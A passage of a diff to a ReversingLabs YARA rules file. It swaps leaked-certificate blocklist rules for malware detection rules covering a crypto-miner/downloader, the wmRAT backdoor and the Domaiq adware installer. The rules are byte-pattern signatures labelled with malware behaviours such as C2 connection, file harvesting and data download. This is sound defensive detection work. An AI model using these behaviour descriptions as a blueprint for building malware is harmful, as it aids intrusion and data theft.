+            ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
+            A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:03" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $persistence_mechanism ) and ( $crypto_miner ) and ( $downloader ) and ( all of ( $network_communication_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Wmrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects wmRAT backdoor."
 		author = "ReversingLabs"
-		id = "a3292707-c481-56a8-abf9-e1a762c76cb6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9ae75871-b08f-52cc-8588-a444d13ecd89"
+		date = "2025-03-17"
+		modified = "2025-03-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L819-L835"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.wmRAT.yara#L1-L144"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "23aadaf1571f23b3f02191e3079171c981d4969d0bd266d6db8c95fc091a1606"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "wmRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$connect_to_c2 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
+            A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 66 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 66 A3 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 A3 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C8 ?? 8D
+            4C 24 ?? A3 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 32 C0 EB ?? 8D 4C 24 ?? C6 05
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B0 ?? 8B 4C 24 ?? 64 89 0D
+            ?? ?? ?? ?? 59 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$find_files_and_get_file_data_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? ??
+            ?? 64 A3 ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 3B C1 74
+            ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? F6 84 24 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5
+            8B 0D ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 89 84 24 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
+            ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 8C
+        }
+		$find_files_and_get_file_data_p2 = {
+            24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B
+            C3 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B
+            CB 75 ?? 2B C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 94
+            24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5 8D 8C 24 ?? ?? ?? ??
+            51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D5 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? 51 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24
+            ?? ?? ?? ?? ?? 8B 4C 24 ?? 52 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8D
+            4C 24 ?? 3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8B CC 89 64 24 ?? 68 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? FF 05 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 89 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24
+        }
+		$find_files_and_get_file_data_p3 = {
+            3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 83 EC ?? 8D 84 24 ?? ?? ?? ?? 8B CC 89 64 24 ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C0 0F B7 D0 8B C2 C1 E2 ?? 0B C2 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
+            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 48 ?? 83 CA ?? F0 0F C1 11 4A 85 D2 7F ?? 8B 08
+            8B 11 50 8B 42 ?? FF D0 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 8B
+            8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B CB 0F 86 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? 8D 64 24 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
+            C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 83 C4 ?? 8B D0 8B FF 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C2
+            83 C7 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 66 8B 4F ?? 83 C7 ?? 66 3B CB 75 ?? DF 6C 24 ??
+            8B C8 C1 E9 ?? 8B F2 DC 05 ?? ?? ?? ?? F3 A5 DD 1D ?? ?? ?? ?? 8B C8 68
+        }
+		$find_files_and_get_file_data_p4 = {
+            8D 84 24 ?? ?? ?? ?? 83 E1 ?? 8D 94 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? F3 A4 89
+            94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 51 8B 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 94 24 ?? ??
+            ?? ?? 3B C2 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24
+            ?? ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 83 CA ?? 8D 48 ?? F0 0F C1 11 4A 85 D2 7F ?? 8B
+            08 8B 11 50 8B 42 ?? FF D0 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? 8B 44 24 ?? 83 C0
+            ?? 8D 50 ?? 83 C9 ?? F0 0F C1 0A 49 85 C9 7F ?? 8B 08 8B 11 50 8B 42 ?? FF D0 8D 8C
+            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81
+            C4 ?? ?? ?? ?? C3
+        }
+		$receive_data_and_write_to_file = {
+            C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ??
+            ?? ?? ?? 8B 7C 24 ?? 8B F0 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 68 ?? ??
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B D4 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 52 FF 15 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4C 24 ??
+            51 56 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 01 15 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B C4 C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 E9
+        }
+		$get_system_information = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
+            53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
+            33 F6 BD ?? ?? ?? ?? 83 CF ?? E8 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 66
+            89 44 24 ?? 88 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 3B C6 74 ?? 8D 9B ?? ?? ?? ??
+            A8 ?? 74 ?? 8D 54 24 ?? 52 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ??
+            89 74 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 89
+            7C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? FE 44 24 ?? D1 E8 89 44 24 ?? 75 ?? 8D 4C 24
+            ?? 51 E8 ?? ?? ?? ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D3 83 ED ?? 0F
+            85 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 4C 24 ?? 33 CC E8
+            ?? ?? ?? ?? 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Organisatie - G2" and pe.signatures [ i ] . serial == "01:31:34:bf" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $connect_to_c2 ) and ( all of ( $find_files_and_get_file_data_p* ) ) and ( $receive_data_and_write_to_file ) and ( $get_system_information )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE
+rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Domaiq potentially unwanted application."
 		author = "ReversingLabs"
-		id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388"
+		date = "2020-07-28"
+		modified = "2020-07-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L837-L853"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/pua/Win32.PUA.Domaiq.yara#L1-L169"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "PUA"
+		tc_detection_name = "Domaiq"
+		tc_detection_factor = 1
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures [ i ] . serial == "01:31:44:76" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L855-L871"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg"
+		$NSIS_CheckIntegrity = {
+            57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45
+            D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81
+            7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45
+            08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ??
+            ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75
+        }
+		$NSIS_ErrorPart = {
+            81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44
+            24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 8B C7 75
+        }
+		$UPX_Decompression = {
+            8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ??
+            8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75
+        }
+		$UPX_Encrypting = {
+            31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75
+        }
+		$dumping_functionv2014 = {
+            55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84
+            ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ??
+            53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ??
+            56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3
+        }
+		$dumping_functionMidVersion = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
+            DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A
+            D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ??
+            ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89
+            59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ??
+            89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A
+            ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55
+            ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B
+            4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0
+            5B E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$dumping_functionE = {
+            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8
+        }
+		$dumping_functionP = {
+            50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56
+            89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A
+            ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ??
+            FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15
+        }
+		$dumping_functionB = {
+            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89
